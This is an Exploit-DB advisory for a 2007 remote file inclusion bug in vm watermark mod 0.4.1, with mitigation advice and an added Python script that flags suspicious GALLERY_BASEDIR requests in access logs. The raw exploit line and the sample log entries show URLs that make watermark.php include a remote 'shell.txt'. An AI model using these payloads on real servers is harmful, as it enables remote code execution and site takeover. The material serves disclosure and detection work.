vendor: vm watermark mod
by: ThE TiGeR
CVSS: 7.5 (HIGH)
CWE: Remote file inclusion
Product Name: vm watermark mod
Affected Version From: 2000.4.1
Affected Version To: 2000.4.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

vm watermark mod 0.4.1 Remote file include

This vulnerability allows an attacker to include remote files in the 'watermark.php' script of vm watermark mod 0.4.1. By manipulating the 'GALLERY_BASEDIR' parameter, an attacker can include a malicious file ('shell.txt' in this case) from a remote server.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of vm watermark mod or to apply necessary security measures to prevent remote file inclusion.
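Because no patch is listed, reviewing web server logs for requests that set this parameter is a practical interim check. The following is an added detection example, not part of the original advisory or the vm watermark mod code: it assumes Combined Log Format access logs and that legitimate clients never supply 'GALLERY_BASEDIR' themselves; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines; all hosts are documentation addresses.
SAMPLE_LOG = """\
198.51.100.7 - - [05/May/2007:10:01:02 +0000] "GET /gallery/watermark.php?GALLERY_BASEDIR=http://192.0.2.10/shell.txt? HTTP/1.1" 200 512 "-" "-"
198.51.100.7 - - [05/May/2007:10:01:09 +0000] "GET /gallery/watermark.php?GALLERY_BASEDIR=hTTp%3A%2F%2F192.0.2.10%2Fshell.txt%3F HTTP/1.1" 200 512 "-" "-"
203.0.113.5 - - [05/May/2007:10:02:00 +0000] "GET /gallery/watermark.php?GALLERY_BASEDIR=../../tmp/ HTTP/1.1" 200 90 "-" "-"
203.0.113.9 - - [05/May/2007:10:03:00 +0000] "GET /gallery/watermark.php?id=12 HTTP/1.1" 200 4096 "-" "-"
203.0.113.9 - - [05/May/2007:10:03:05 +0000] "GET /gallery/view.php?note=GALLERY_BASEDIR HTTP/1.1" 200 100 "-" "-"
"""

# Client address and request target from a Combined Log Format line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that starts with "scheme://" points the include at another host.
SCHEME = re.compile(r'^\s*[a-z][a-z0-9+.\-]*://', re.I)


def classify(line):
    """Return (client, kind, value) if the request sets GALLERY_BASEDIR on
    watermark.php, else None. Values are URL-decoded before inspection."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    if not url.path.lower().endswith("/watermark.php"):
        return None
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name == "GALLERY_BASEDIR":
            kind = "remote-url" if SCHEME.match(value) else "path-override"
            return (client, kind, value)
    return None


def scan(log_text):
    """Classify every line of a log and keep only the hits."""
    return [hit for line in log_text.splitlines() if (hit := classify(line))]


if __name__ == "__main__":
    for client, kind, value in scan(SAMPLE_LOG):
        print(f"{client}\t{kind}\t{value}")
```

Only the query string is inspected, so a parameter sent in a POST body will not appear in access logs and needs request-body logging or a WAF rule instead.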

Exploit-DB raw data:

#vm watermark mod 0.4.1 Remote file include

#Download script : http://gallery.menalto.com/files/vm-watermark_mod-0.4.1.zip

#Thanks to str0ke

#Exploit :

#http://www.site.com/[path]/watermark.php?GALLERY_BASEDIR=shell.txt?

#Discovered by : ThE TiGeR

# Miro_Tiger100[at]Hotmail[dot]com

# milw0rm.com [2007-05-05]